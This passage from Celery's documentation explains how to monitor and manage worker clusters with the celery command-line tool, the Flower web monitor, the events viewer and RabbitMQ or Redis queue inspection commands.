refinedweb
136
58.48
Welcome to WebmasterWorld Guest from 54.80.115.140 Theoretically, you would think it would help, as parsing xml is programmically more rigid than non-valid html... Nothing is wrong with html: after all, xhtml is just xml-compliant markup that corresponds to the html 4.01 schema, basically. Still, your page still isnt *quite* xml. And the way things are currently going, you can almost bet that pages in the future will be written mainly xml( or at least a growing percentage) ... But in terms of programming generated pages in .net, for instance, its a breeze from a programmers point of view to generate xml content with stylesheets to make it render appropriately. Unfortunately, only gecko-based browsers and opera can hanndle it... But, I have faith that the next version of IE can handle it. If not, XSLT can then be easily encorporated for IE users. Bottom line, I like playing with the latest and greatest, even though its not always commercially feasible. I think the question should be could google index the xml and the associated xslt style sheet with its h1 tags anchors alts etc. Or more succinctly what factors would google use to rank an xml document. The xhtml standard is I believe supposed to be transition or bridge from html to xml compliancy for the web as whole according to W3 if i remember correctly. Anyone please feel free to correct anything above. Seperation of presentaion from content is one. There are many others though. You're right though john I was thinking in terms of client side transformation...Still I'm amazed that we have to transform a new standard into an old standard for likes of someone like Google. "I was trying to surf an xml doc in an old version of Netscape earlier today. Barf, said the browser." The old netscape dosen't have an xml parser. Jeez I'm not trying to be funny but if you're using an old Netscape I really am worried for Google. [edited by: tantalus at 12:45 pm (utc) on Dec. 18, 2003] What's the advantage of XML over HTML? 1. Seperation of presentaion from content is one. There are many others though. 2. Integration with SOAP engines. 3. A far more "strict" mark-up language than HTML. 4. Storage of content data in a tree-like structure. TJ Doesn't Google's searching the XML as txt find the data? If there are transforms associated then, in a world of browsers that can do the business, the user would see the data transformed.. I'm surprised people are expecting Google to do the transforms.. but then I am new to XML/XSLT. My impression was that XHTML 1.1 -> 2.0 was here to stay and XSLT can generate it easily enough. Anyway if you're interested.. I did a search for .xml heres a couple of examples from the serps: www.****xx.com/weblog/index.xml File Format: Unrecognized - View as HTML Similar pages xx.****.com/index.xml File Format: Unrecognized - View as HTML Similar pages All of them say "File Format: Unrecognized" and all are rss feeds if that makes any difference. Click on view as html and you get a blank google cache I'd be far more worried if Google wasn't interested in being compatible for the entire searching public. There are still large corporations and government agencies using Netscape 4.7. Under 5% usage isn't much to worry about being inaccessible for with the site Joe_Webmaster's nephew made for him in Front Page that gets maybe 500 uniques a month looking for budget widgets, but when you're getting into billions of searches that's a lot of users whose needs would be neglected. 1. Does Googlebot follow a <a href> found in an XML page? 2. What about links that are not in the form of <a href>, such as <link></link>. Does/will google follow those? I guess my main question is, are pure XML pages currently "dead ends" for Googlebots? see this thread maybe [webmasterworld.com ] It seems probable that the days of coding the actual display language will end and a machine language standard will be adopted universally and everything will be done by command text docs or wsiwyg like console apps are done today before the computer world gets turned upside down by xml or xhtml. Wishing html was dead won't make it so. but I expect it'll be all the rage in ~2006+? I suspect a little sooner than that. But it is certainly the future path - a search around for tools and applications that use XML as a mark-up language are testament to that. It's not about browsers. It's about the integration of many platform-independant systems over the internet, of which browsers form part. I doubt whether HTML will ever be "dead" - it will just move through various incarnations.. TJ I'd love to know whether your attaching an xsl stylesheet to your posts :) oops its just gone. I quickly looked at the advaned search on google and noticed that in 'return results of the file format' drop down neither .txt nor xml was listed. It does seem to index the title and follow links to but that seems to be about it.. I agree. The problem with XML from the point of view of a search engine robot is what it says on the tin, ie eXtensible Markup Language. There are lots of different namespaces and flavours of XML which is one of its appeals, it can be all things to all men. I guess that if it does get past the XHTML stage then there would probably be a limited range of doctypes and dtds that search engines would be prepared to crawl and parse. I think that the tail may be wagging the dog for some time to come on this one and who in their right mind is going to produce a web page that SE robots can't crawl when it is actually easier to produce one that they can. Best wishes Sid It does seem to index the title and follow links to but that seems to be about it. That doesn't surprise me.... although "indexing the title" I don't really understand. Are you sure it's not indexing the anchor text of the link to the XML file? XML is just text. If you create an XML file, but with an .HTML extension, then google will index it. And if you use <a href=> style tags for link structure, then it will probably follow the link and transfer PR through. But it will not validate, and to google it sure will look ugly. XML is really just a protocol and data storage format. The data from an XML file is parsed into an HTML file for display to the user. And it's the "display to the user" part that google is interested in. XML is also used to call a function, method or procedure on a SOAP server or other XML based server application over a network. Googlebot would have absolutely no interest in that. <guess>So I suspect what you're seeing in google is indexed anchor text and nothing more</guess>. TJ If you want to play with the latest and greatest, that is fine. Go for it. But if you want to be useful to the greatest number of people, then go with HTML. Google's goal is to serve the many, so they need to be concerned with what works with most browsers. I expect that xml will gain in popularity, but there is no compelling reason for most sites to change from HTML. There are billions of static pages out there that are going to stay on the web for a long time, and they are owned by people that have no interest in being on the bleeding edge. XML will have to be in the browsers for quite a while before it even starts making a dent in the total number of pages out there. Kinda right...it seems to use the url as the title, sorry wasn't looking. kirkcerny501 It might be to do with the doc type you are using...ie <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ""> "Google needs to worry about the *majority* of their users" I agree with your sentiments bigdave and, at the end of the day as was said previously all you need do is implement a server side transformation...but. Does google like <br> better than <br /> Hi, I have an XHTML site/page which is in SERPs at #3 for its primary term. It has quite a few <br /> and /> at the end of image tags this does not seem to harm its SERPs ranking. From a sample of one I can say that XHTML tags do not seem to effect Google. Best wishes Sid. Here is someting that a lot of people in the computer industy just don't understand. Standards bodies don't set standards. They never have and they never will. Even after it is voted in as a standard, it is not a standard. The only real form of standard is a defacto standard, where it is the one that is actually used. Look at all the HTML that was depreciated with the introduction of CSS, or the new tags such as <strong>. Did those tages really go away with the introduction of the *new* way 6to do things as the "standards" suggest? Hell no! Because the users did not depreciate them. In fact, the older method is usually a lot easier to read. So what is represented in the HTML 4 docs is not really the standard, Everything new is part of the HTML 4 standard, but those things that have been removed or depreciated from the doc are no less a part of the standard. No one writing a browser will start pretending that they do not know what <b> means, just to meet W3C specs. I'm sure that there are people in google looking at xml, and they will be ready to fully index it when they decide there is value to it. Probably the best thing XML supporters can do is to start putting up xml pages so that they can reach a critical mass in the supply of pages. They should just understand that if they want to be on the bleeding edge, that it is their blood that will be spilled. Those pages will not rank well for now. It is better to start new topics in a new thread.. Closed tags such as <br /> are XHTML rather than HTML so your a couple of steps ahead of yourself with a HTML 4.01 Transitional header, which is why your getting suggestion that the tag is xml. You might want to read this thread.. [webmasterworld.com ] HTML 4.01 Transitional.. Should I change this doc type statement, delete it, keep it?
https://www.webmasterworld.com/forum3/20840.htm
CC-MAIN-2018-17
refinedweb
1,851
81.43
While [Ilias Giechaskiel] was waiting for his SIM900 shield to arrive, he decided to see what he could do with an old Nokia 6310i and an Arduino. He was researching how to send automated SMS text messages for a home security project, and found it was possible to send AT commands via the headphone jack of Motorola phones. But unfortunately Nokia did not support this, as they use a protocol known as FBus. With little information to go on, [Ilias] was able to break down the complicated protocol and take control with his Arduino. With the connections in place, [Ilias] was able to communicate with the Nokia phone using a program called Gnokii — a utility written specifically for controlling the phone with a computer. Using the Arduino as an intermediary, he was eventually able tap into the FBus and send SMS messages. Be sure to check out his blog as [Ilias] goes into great detail on how Nokia’s FBus protocol works, and provides all source code needed to replicate his hack. There is also a video demonstration at the end showing the hack in action. 9 thoughts on “Controlling Nokia Phones With Arduino” That’s cool , I gotta try it with my old Nokia phone That’s a nice hack! I want to say ‘at last!’ because there’s so many old phones that could be used for something like this! Great job on getting the protocol to work! A small comment on the voltage divider – the 2.5V level is still considered a logic high from the phones perspective and it’s easier to make a divider with the same value instead of calculating the right values (and finding them in the parts bin). There’s absolutely nothing wrong with the approach – it’s the right way. The lazy way of using a 1:2 divider is just quicker sometimes.. I think that’s the reason behind the divders that is mentioned in the article Nice! I learnt a lot playing with FBus :) For anyone looking for more information, I did a similar project with old Nokia phones many years ago. I go over the electronics and software used. I ended up offloading the work to a PC via a DIY-serial cable, where a Python script calls into Gammu (CLI for older Nokia devices): fun fact about SIM900(D): you can change the IMEI of the module using the undocumented AT+SIMEI=”new imei” command Old Siemens phones (x35 and x45 series) are even simpler to interface. They have 3.3V UART interface on the bottom of the phone, and commands are very well documented. The drawback is they use PDU message format, and can not be forced in text mode, so you have to write functions for 7-bit->8bit (and vice versa) conversions. Not a big deal, but it complicates thigs a bit, especially if you use uC with 128Byte RAM. Good thing is that you can buy those phones for few bucks while TC35 module (supports text mode) costs about $30. It’s worth noting that you can send an SMS with 3 lines of code via qpython3 and an old android: import android Andy = android.Android() Andy.smsSend(‘5553217654′,’hello world’) I could not help smiling when I saw the picture of the wires soldered to the bottom connector :-) Excellent hack, great writeup! I’d like to make an Arduino shield for this. Anyone interested in giving some feedback? Here is the Hackaday post regarding my blog post. Some good information in the comments.
https://hackaday.com/2015/01/01/controlling-nokia-phones-with-arduino/
CC-MAIN-2019-39
refinedweb
591
69.82
Johannes Stezenbach wrote: >Hi, > . :) >> >> > >Two problems: >- I was talking with Mauro about merging dvb and v4l CVS trees, > and they want to keep backwards compatibility; we'll need to sort > this out first > > Last night, I've finished applying Jean Delvare's changes to the video4linux tree. The I2C_DEVNAME / i2c_clientname --> client.name stuff in 2.6.14 is actually backwards compatable with older 2.6 kernels. The incompatability exists somewhere in 2.5.X series.... AFAIK, the only portion of these patches that break kernels older than 2.6.14-rc1 are changes such as the following: @@ -408,7 +406,7 @@ i2c_adapter->dev.parent = &dev->pci->dev; i2c_adapter->algo = &saa7146_algo; i2c_adapter->algo_data = NULL; - i2c_adapter->id = I2C_ALGO_SAA7146; + i2c_adapter->id = I2C_HW_SAA7146; i2c_adapter->timeout = SAA7146_I2C_TIMEOUT; i2c_adapter->retries = SAA7146_I2C_RETRIES; } This can be handled in one of two ways: 1) either do something like this: @@ -388,14 +386,18 @@ #ifdef I2C_CLASS_TV_ANALOG .class = I2C_CLASS_TV_ANALOG, #endif - I2C_DEVNAME("saa7134"), + .name = "saa7134", +#if LINUX_VERSION_CODE > KERNEL_VERSION(2,6,13) + .id = I2C_HW_SAA7134, +#else .id = I2C_ALGO_SAA7134, +#endif .algo = &saa7134_algo, .client_register = attach_inform, ...but I know you don't like these #if's and #ifdef's in dvb-kernel cvs. 2) An alternative would be to create a "compat.h" , which could assign the value of I2C_HW_SAA7146 to be equal to the value of I2C_ALGO_SAA7146, if I2C_HW_SAA7146 isn't already defined. >-> > > ... > >We'll need to get this patch from git and apply the dvb and v4l >parts when the time has come. > > So, I repeat... the v4l portion has already been applied to video4linux cvs, without hindering kernel backwards-compatability. The dvb portion can easily be applied with some #if macros / compat.h stuff ..... meanwhile, don't let this stop the tree-merging process.... If video4linux is backwards compatable and dvb-kernel isn't right away, all that means is that we should not attempt to compile dvb-kernel stuff when compiling the merged tree against older kernels (until we work out the backwards-compat kinks). We can take care of these decisions in a configure script.... -- Michael Krufky
http://www.linuxtv.org/pipermail/linux-dvb/2005-September/004768.html
CC-MAIN-2014-10
refinedweb
335
67.15
Getting the off by a penny problem... Enter an amount in double, for example 11.56: 12.35 Your amount 12.35 consists of 12 dollars 1 quarters 0 dimes 1 nickels 4 pennies Press ENTER to continue... Where do I properly add my + .00001 I tried a few places but it did not work...any insight... Code: #include <iostream> using namespace std; int main() { // Receive the amount cout << "Enter an amount in double, for example 11.56: "; double amount; cin >> amount; int remainingAmount = static_cast<int>(amount * 100); // Find the number of one dollars cout << "Your amount " << amount << " consists of \n" << "\t" << numberOfOneDollars << " dollars\n" << "\t" << numberOfQuarters << " quarters\n" << "\t" << numberOfDimes << " dimes\n" << "\t" << numberOfNickels << " nickels\n" << "\t" << numberOfPennies << " pennies"; /* Scaffolding code for testing purposes */ cin.ignore(256, '\n'); cout << "Press ENTER to continue..." << endl; cin.get(); /* End Scaffolding */ return 0; }
http://cboard.cprogramming.com/cplusplus-programming/116021-off-penny-problem-printable-thread.html
CC-MAIN-2015-48
refinedweb
141
67.04
- Kernix Lab, Publié le 07/11/2016 With the democratization of the internet, interacting and sharing knowledge is simpler than ever. This digital world has enabled a whole new way of consuming, learning, communicating and creating relationships, unleashing an enormous amount of data that we can analyze to get a better understanding of human behavior. One way that we can use this data is to build networks of relationships between individuals or objects (friendships between Facebook users, co-purchasing of products on Amazon, genetic co-occurrence etc…). The field of community detection aims to identify highly connected groups of individuals or objects inside these networks, these groups are called communities. The motives behind community detection are diverse: it can help a brand understand the different groups of opinion toward its products, target certain groups of people or identify influencers, it can also help an e-commerce website build a recommendation system based on co-purchasing, the examples are numerous. If you want to learn about community detection in more detail, you can read about it here. The aim of this article is to introduce you with the principal algorithms for community detection and discuss how we can evaluate their performance to build a benchmark. Furthermore, depending on the field we are studying, we encounter many different types of networks and this can cause variations in the algorithms’ performance. That’s why we will also try to understand what elements of a network’s structure affect the performance of these algorithms. Different methods have emerged over the years to efficiently uncover communities in complex networks. The most famous principle is maximizing a measure called modularity in the network, which is approximately equivalent to maximizing the number of edges (relationships) inside the communities and minimizing the number of edges between the communities. The first greedy (in terms of computation) algorithm based on modularity was introduced by Newman in 2004. He was already at the origin of the Girvan-Newman algorithm in 2002 which consists in progressively removing edges with high betweenness (likely to be between communities) from the network. Another method to detect communities is by simulating random walks inside the network. It is based on the principle that a random walker will tend to stay inside densely connected areas of the graph. That is the idea behind the walktrap algorithm, introduced by Pascal Pons and Matthieu Latapy in 2005. It also inspired the infomap algorithm created in 2008 by Martin Rosvall. However, these algorithms only consider one community per node, which might be a wrong hypothesis in some cases. Several papers on the subject base their models on overlapping communities (i.e. where nodes can belong to several communities). The clique percolation method, made popular by Cfinder (freeware for overlapping community detection) in 2005, is the most recognized method to detect overlapping communities. The concept is that a network is made of many cliques (subsets of nodes such that every two distinct nodes in the clique are adjacent) which overlap. One clique can thus belong to several communities. Jaewon Yang and Jure Leskovec also published a paper in 2013 for their own overlapping community detection algorithm called BigClam. The particularity of this algorithm is that it is very scalable (unlike the algorithms mentioned before) thanks to non-negative matrix factorization. The authors claim that contrary to common hypothesis, community overlaps are denser than the communities themselves, and that the more communities two nodes share, the more likely they are to be connected. You can find here and here reviews of these different methods. The issue at hand is to determine which algorithm we should use if we want to detect communities in a network. Is there one “best” algorithm? Or does it depend on the network we are studying and the aim of our study? First, we have to establish the criteria we want to compare the algorithms on. The most efficient way of evaluating a partition is to compare it to the communities we know exist in our network, they are called “ground-truth” communities. Several measures enable us to make that comparison, notably the normalized mutual information (NMI) and the F-Score. There are two famous benchmark networks generators for community detection algorithms: Girvan-Newman (GN) and Lancichinetti-Fortunato-Radicchi (LFR). Since it is difficult to obtain many instances of real networks whose communities are known, a solution is to generate networks with a built-in community structure. It is then possible to evaluate the performance of the algorithms (usually with the NMI). The most famous and basic generator (GN) was not acknowledged as a realistic option. Indeed, the networks generated are not representative of the heterogeneity found in real-life networks (in particular, all the nodes have approximately the same degree when a “real” network should have a skewed degree distribution). A more realistic benchmark was then introduced (LFR), where the node degrees and community sizes are distributed according to power law. You can read about these benchmarks algorithms here and here. However, the LFR benchmark doesn’t consider overlapping communities and generating large graphs could take some time depending on your computation capacities. This is why we are going to use real-life networks available on the Stanford large network dataset collection to build our benchmark. There are five networks with ground-truth communities (Amazon, DBLP, Orkut, Youtube and Friendster) but we won’t be able to use the Friendster graph because of its volume. To manipulate the data and the algorithms, we will use the python igraph library. Let’s load the Amazon graph and try the fastgreedy community detection algorithm. In this graph, the nodes are products and a link is formed between two products if they are often co-purchased. For this algorithm, the graph needs to be undirected (no direction for the edges). It should take just under 15 minutes to get a result. As you can see, you get a list of the nodes’ community ids. import igraph as ig g = ig.Graph.Read_Ncol('/Users/Lab/Documents/DonneesAmazon/com-amazon.ungraph.txt') print 'number of nodes: '+ str(len(g.vs())) print 'number of edges: '+ str(len(g.es())) number of nodes: 334863 number of edges: 925872 Applying the fastgreedy algorithm g=g.as_undirected() dendrogram=g.community_fastgreedy() clustering=dendrogram.as_clustering() membership=clustering.membership print membership[0:30] [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3] Now that you have a membership list for the nodes, how can you quantitatively evaluate the quality of the partition made by the algorithm (you could want to evaluate it visually but this network is way too big) ? As we said before, the best way to do that is to compare our membership list to the ground-truth membership list via a performance measure. There are functions implemented in scikit-learn for this task but the issue is that these functions only consider non-overlapping communities whereas the ground-truth communities of our graphs are overlapping. This means we have to create a performance measure that takes into account overlapping communities. Luckily, Yang and Leskovec’s article on BigClam puts forward its own benchmark based on the datasets we are using. We decided to implement their performance method, which computes the F-Score on subgraphs of the original graph. This method solves the problem of the overlapping communities since we implement the F-Score ourselves, but it also solves the scalability problem of some algorithms which can’t work on our biggest graphs. The F-score is the harmonic mean of precision and recall. More precisely, precision is the number of true positives divided by the total number of positives (among the nodes I have classified in a community, how many actually belong to that community ?), and recall is the number of true positives divided by the number of true positives and false negatives (how many nodes did I correctly classify in one community in comparison to the total number of nodes in that community ?). Let’s break down the performance evaluation method (see Stanford’s article for more details and here for the whole PerformanceFScore script): The first step is to randomly select a subgraph inside our original graph (a subgraph is made of at least two ground-truth communities). Selection of a sugbraph #Here, we randomly select a node in our network to build a subgraph around it. Com=[0] #Number of communities of the node. #A node must have at least two communities. while len(Com)<2: #A node is selected randomly. rand=randint(0,len(g.vs())) node=g.vs[rand] #We check if the node was classified in a community (if he exists in the ground-truth file). if node["name"] in nbComPerNode.keys(): #We get the communities he belongs to. Com=nbComPerNode[node["name"]] else: continue #In the ground-truth file, we take all the nodes that share at least one community with our original node. GT={} with open(FileGT,"r") as filee: for indx,line in enumerate(filee): if indx in Com: line = line.rstrip() fields = line.split("\t") nodes=[] for col in fields: nodes.append(col) GT[indx]=nodes filee.close() #We transform the node names into node indices to create the subgraph with igraph. ndsSG=set() for com in Com: temp=[nomIndice[k] for k in GT[com]] ndsSG.update(temp) ndsSG.add(node.index) subgraph=g.subgraph(ndsSG) We apply the community detection algorithm of our choice on the subgraph. #We apply the algorithm. commClus=ChoixAlgo(algo,subgraph,commClus,path,SnapPath) We compute the F-Score between all detected communities and all ground-truth communities and keep the highest (we do that as many times as there are detected communities and take the mean of the highest F-Scores). We compute the F-Score between all ground-truth communities and detected communities and keep the highest (we do that as many times as there are ground-truth communities and take the mean of the highest F-Scores). Computation of the F-Score def calculFScore(i,j): i=[int(x) for x in i] j=[int(x) for x in j] inter=set(i).intersection(set(j)) precision=len(inter)/float(len(j)) recall=len(inter)/float(len(i)) if recall==0 and precision==0: fscore=0 else: fscore=2*(precision*recall)/(precision+recall) return fscore We take the mean of the two mean F-Scores. #This gives the F-Score on one subgraph measure=(fscore1+fscore2)/2 We repeat the operation on another subgraph. In the end, we take the mean of the F-Scores on all the subgraphs. However, the F-Score that you get should be really low, which is why we normalize the scores between 0 and 1. We selected five algorithms to compare here : snap’s infomap, igraph’s infomap, igraph’s fastgreedy, snap’s cpm and snap’s BigClam. This way we can compare the most popular algorithms for non-overlapping communities with algorithms for overlapping communities. For all of our graphs we get the same ranking. Igraph’s infomap gets the best F-Score, closely followed by snap’s infomap. Then we have in this order and close : BigClam, cpm and fastgreedy. However, we have to keep in mind that the F-Score favors big communities and that infomap tends to create big communities. Here is an example of the ranking we get on the Amazon graph : This result is surprising since we have some graphs with a lot of overlaps (like the Amazon graph which has an overlap rate of 0.95) but the overlapping community detection algorithms don’t work better on it than on the DBLP graph which has an overlapping rate of 0.35. As a reminder, in the DBLP graph the nodes are authors of research papers in computer science, and two authors are linked if they wrote at least one paper together. It means that even if a graph has indeed a lot of overlapping communities, the dedicated algorithms are not able to correctly identify these overlaps enough to have a better performance than infomap (at least on our test graphs). However, it is acknowledged that the various types and structures of graphs in real life affect the results of the algorithms. Indeed, the algorithm we want to use has to be adapted to the structure of our graph. Depending on the field or the context we are studying, we can encounter many different structures in graphs. if we take subgraphs of the Youtube and DBLP graphs, we can tell that their structures are quite different : Indeed, the Youtube subgraph has a clear tree structure whereas the DBLP subgraph has more of a wheel structure. What is the impact of one structure or the other on the algorithms’ performance? To understand that, we created a small graph from twitter data on the subject of nuclear power (The snap graphs are too big to easily apply our algorithms and create visualizations). The nodes (998 in total) are users and the edges are retweets. The structure is identical to the Youtube subgraph’s (tree). Let’s visualize the results of different community detection algorithms on this graph : Judging only by the visualizations since we don’t have the ground-truth communities, Infomap and fastgreedy seem to work well on this graph structure, the only difference is that whereas infomap creates one big community (in red), fastgreedy tends to break it in little communities. However, as the graph grows in size, the algorithms’ behaviour reverse and fastgreedy struggles more and more to detect smaller communities whereas infomap becomes a lot more precise. Here, which algorithm to use depends on the aim of your study : in the long term, fastgreedy won’t be very good at detecting small communities and will tend to merge them together (this is called the resolution limit), but you might want bigger, more global communities. Infomap is better at identifying smaller groups of people who follow one particular leader, so it’s the way to go if you want a precise community detection (which is usually better). A final vizualisation of the result for infomap in javascript is available later in the article, there were too many nodes to simply process with matplotlib. On the contrary, we can see that the overlapping community detection algorithms BigClam and cpm don’t work at all on our twitter graph. Most of the nodes are not classified (nodes in white, the black nodes belong to several communities). The reason for that is the way these algorithms detect the communities. The cpm (clique percolation) algorithm tries to find cliques inside the graph (the number of nodes per clique k is a parameter of the algorithm). The issue with this graph is that there are no cliques made of more than two nodes and there are very little possibilities of overlap between the cliques, which makes it very difficult for the algorithm to identify them (even more if k>2). We also tried the kclique algorithm from the networkx library (which is based on the clique percolation method), but with k=2 the algorithm classifies almost all the nodes in one community and with k>2, it gives the same kind of result as cpm. The BigClam algorithm tries to find overlaps between communities initiated with locally minimal neighborhoods, but given the structure of our graph, these initialization communities should have very little overlap. The twitter graph is a good example of a structure that is not suited for these overlapping community detection algorithms. A solution to that would be to change the way we select our twitter data to get a more appropriate structure. For example, we could consider studying the replies or the mentions between users. Let’s take a subgraph of our DBLP test graph, where the structure is very different from the twitter graph, and observe the result of the cpm algorithm: This result shows that the clique percolation method works way better on a wheel structure, where overlaps are more likely and more easily identifiable. However, infomap still had a better performance overall in the sense of the F-Score on this graph. Infomap and fastgreedy also seem to work pretty well on the twitter graph so we could just use those instead of overlapping algorithms. Once you have applied your community detection algorithm on your graph and you are satisfied with the result, it can be very interesting to build an interactive visualization. It helps materialize your community detection and get a global point of view on your communities and their members. The igraph library has a plot function for this task but the visualization is not interactive. However, there are differents javascript libraries that offer very interesting interactive templates. D3.js has a force-layout graph template where you can play with the nodes and move them around, but Vis.js has a very complete template for community detection visualization that we tried with our twitter graph. All we had to do was adapt our data to the template (it takes json or js files) and use boostrap.js to add descriptions for the communities. The visualization is available on the kernix github here , and the original template here. Here are several screenshots : To conclude this post, community detection in complex networks is still a very challenging field. Many algorithms have been created to efficiently identify communities inside large networks, infomap being recognized as the most reliable. However, correctly evaluating the performance of these algorithms is still an issue, especially in the case of overlapping communities. The only way we can appreciate the quality of an algorithm is to test it on a graph with a built-in community structure, or where we know the ground-truth communities, and even then, there isn’t any implemented measure for overlapping communities. Maybe completing community detection on large graphs with semantical analysis could be a way to have a little more control on the results. We still saw with the example of the twitter graph that some algorithms yield pretty good results on small graphs (given that we use the best suited algorithms for the graph’s structure), and in this case the graph is small enough to build a nice visualization of our result and get an idea of the quality of the partition.
https://www.kernix.com/article/community-detection-in-social-networks/
CC-MAIN-2020-24
refinedweb
3,072
50.26
Ever since the 2013 BUILD conference, a huge amount of people have attempted to integrate peripherals into their modern applications – and of all the devices we can plug into our computers only one has stood out as the prized device people want to connect? The Dream Cheeky Thunder Missile Launcher is a $35 novelty toy available from various retailers around the world. The Thunder is simple in its constructions – its a USB based air-powered missile launcher that allows you to sight and fire foam darts at unsuspecting people hovering in your immediate vicinity. The device has been so popular with geeks globally that it has even featured in the Big Bang theory. Aside from its creditability with those of us that frequent code, one of the other exciting features of the Thunder is its driver stack. Instead of using a proprietary driver in a similar fashion to the OWI-535 robotic arm the device itself actually leverages an existing Windows standard as a HID (Human interface device) in much the same way as a keyboard and mouse. So why would this be existing for us a developers? Firstly because we don’t need to do anything with the OS to install or configure the device, and also as it uses a standard Windows driver which has been ported to the ARM stack the device will also work on a Windows RT device such as a Surface too! Plugging in the device and Windows recognizing it is only a small part of our solution. As app developers we want to leverage this device from our modern application, and allow our users to start shooting each other. Luckily Windows 8.1 provides us with the support for such a dilemma by introducing the Windows.Device.HumanInterfaceDevices namespace. So lets spend a few minutes looking at the code required to start firing our missiles. Windows.Device.HumanInterfaceDevices As with any modern application that wants to go beyond some standard UI prompts, we need to ask permission from our user to access the device. This is a security feature that prevents apps from becoming malware. In Windows 8.1, as per Windows 8 we do this via the package.appxmanifest file, and we leverage the namespace extensions that allows us to reference the new 8.1 capabilities. Currently Visual Studio manifest editor doesn’t support these changes, so open up your file in a text editor and add the following lines: <?xml version="1.0" encoding="utf-8"?> <Package xmlns="" xmlns: <Capabilities> ... <m2:DeviceCapability <m2:Device <m2:Function </m2:Device> </m2:DeviceCapability></Capabilities> </Package> In this example I’ve been a little bit broader in the request I am making to the user. Specifically instead of defining a product, I am asking for access to any HID device which match the usage page and usage ID included. I’ve done this deliberately to show the difference between specifying an app looking for one particular devices vs. a range of devices. If you did want to be a little granular you could specify the VID and PID as per my USB example in stead of the any argument. Once we have declared our intention to access, we need to wire up some code to find if the device is attached to our machine. Again just to show some contrast to my last post, I’m going to do this using a DeviceWatcher. If I wanted a moment in-time view of if the device is connected I can use the Windows.Devices.Enumeration technique I demonstrated in my robot arm article. Instead I have opted to use a watcher, using a method on the same object Windows.Devices.Enumeration.DeviceInformation. A watcher however monitors the device manager on the machine for devices to be added, and will raise an event if it then finds a device. This provides you with functionality within your app to deal with devices to be added or removed at anytime in the life cycle. DeviceWatcher Windows.Devices.Enumeration Windows.Devices.Enumeration.DeviceInformation The code we need to create a watcher is : const ushort vid = 8483; const ushort pid = 4112; const ushort uid = 16; const ushort uPage = 1; var deviceWatcher = DeviceInformation.CreateWatcher( HidDevice.GetDeviceSelector(uPage, uid, vid, pid)); deviceWatcher.Added += (s, a) => Dispatcher.RunAsync( CoreDispatcherPriority.Normal, async () => { .. do something here.. }); deviceWatcher.Start(); This is very similar to any device connectivity connection. We are creating an AQS (query statement) string using a helper method on Windows.Devices.HumanInterfaceDevice.HidDevice by passing in the Vendor ID, Product Id, Usage ID, and Usage Page values. The AQS is then used by the watcher to find any devices connected to the machine, which causes the event to be fired. One important piece of code to note is the dispatcher in the event handler. This is present because when the device is added and you try to connect a Windows appears in the UI asking for permission from the user. Therefore any code used to connect to the device needs to be on the UI thread. Windows.Devices.HumanInterfaceDevice.HidDevice To actually open up a connection to the device, it’s a matter of calling one async method on the Windows.Devices.HumanInterfaceDevice.HidDevice object. _hidDevice = await HidDevice.FromIdAsync(a.Id,FileAccessMode.ReadWrite); The FromIdAsync method takes two arguments, which is the device ID (returned as part of the DeviceInformation from the watcher event), and also an enumerated FileAccessMode to specify the connection type – which in our instance is ReadWrite due to our wanting to pass commands to the device. FromIdAsync DeviceInformation FileAccessMode ReadWrite Now we have an active connection to the device, so we can start sending data to it. HID devices have fairly small and easy payloads to transmit – if you imagine a keyboard HID device it simply sends the corresponding keypress data, which are all relatively small. Being of a similar device type the Thunder expects simple small payloads (especially in comparison to the USB robotic arm), which correspond to up, down, left, right, fire. To send such data, we simply use a byte[] and add it out an OutputReport object. Luckily another helper class creates the object for us, so we just need to append our payload and send the data using code similar to this: OutputReport private async Task SendOutputMessage(byte[] message) { if (_hidDevice != null) { var report = _hidDevice.CreateOutputReport(); report.Data = message.AsBuffer(); await _hidDevice.SendOutputReportAsync(report); } } And that is it! Using those few lines of code we have an active connection to the USB Thunder missile launcher and can start sending commands. Here is how we would toggle the LED on: var LED_ON = new byte[] { 0, 3, 1, 0, 0, 0, 0, 0, 0 }; await SendOutputMessage(LED_ON); In the meantime have fun with your hardware hacking! This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
https://www.codeproject.com/Articles/659380/Connecting-the-Dream-Cheeky-Thunder-Missile-Launch?PageFlow=FixedWidth
CC-MAIN-2017-22
refinedweb
1,146
52.19
There are several tools available to monitor and inspect Celery clusters. This document describes some of these, as as well as features related to monitoring, like events and broadcast commands. celery can also be used to inspect and manage worker nodes (and to some degree tasks). To list all the commands available do: $ celery help or to get help for a specific command do: $ celery <command> --help shell:: List active nodes in this cluster $ celery status result: Show the result of a task $ celery. $ celery purge Warning There is no undo for this operation, and messages will be permanently deleted! inspect active: List active tasks $ celery inspect active These are all the tasks that are currently being executed. inspect scheduled: List scheduled ETA tasks $ celery inspect scheduled These are tasks reserved by the worker because they have the eta or countdown argument set. inspect reserved: List reserved tasks $ celery inspect reserved This will list all tasks that have been prefetched by the worker, and is currently waiting to be executed (does not include tasks with an eta). inspect revoked: List history of revoked tasks $ celery inspect revoked inspect registered: List registered tasks $ celery inspect registered inspect stats: Show worker statistics (see Statistics) $ celery inspect stats control enable_events: Enable events $ celery control enable_events control disable_events: Disable events $ celery control disable_events migrate: Migrate tasks from one broker to another (EXPERIMENTAL). $ celery migrate redis://localhost amqp://localhost This command will migrate all the tasks on one broker to another. As this command is new and experimental you should be sure to have a backup of the data before proceeding. Note All inspect and control commands supports a --timeout argument, This is the number of seconds to wait for responses. You may have to increase this timeout if you’re not getting a response due to latency. By default the inspect and control commands operates on all workers. You can specify a single, or a list of workers by using the –destination argument: $ celery inspect -d w1,w2 reserved $ celery control -d w1,w2 enable_events Flower is a real-time web based monitor and administration tool for Celery. It. HTTP API OpenID authentication Screenshots More screenshots: You can use pip to install Flower: $ pip install flower Running the flower command will start a web-server that you can visit: $ celery flower The default port is, but you can change this using the –port argument: $ celery events You should see a screen like: celery events is also used to start snapshot cameras (see Snapshots: $ celery events --camera=<camera-class> --frequency=1.0 and it includes a tool to dump events to stdout: $ celery events --dump For a complete list of options use --help: $ celery events --help, e.g: rabbitmqctl list_queues -p my_vhost … Finding the number of tasks in a queue: $ rabbitmqctl list_queues name messages messages_ready \ messages_unacknowledged Here messages_ready is the number of messages ready for delivery (sent but not received), messages_unacknowledged is the number of messages that If you’re using Redis as the broker, you can monitor the Celery cluster using the redis-cli(1) command to list lengths of queues. does will not affect the monitoring events used by e.g. Flower as 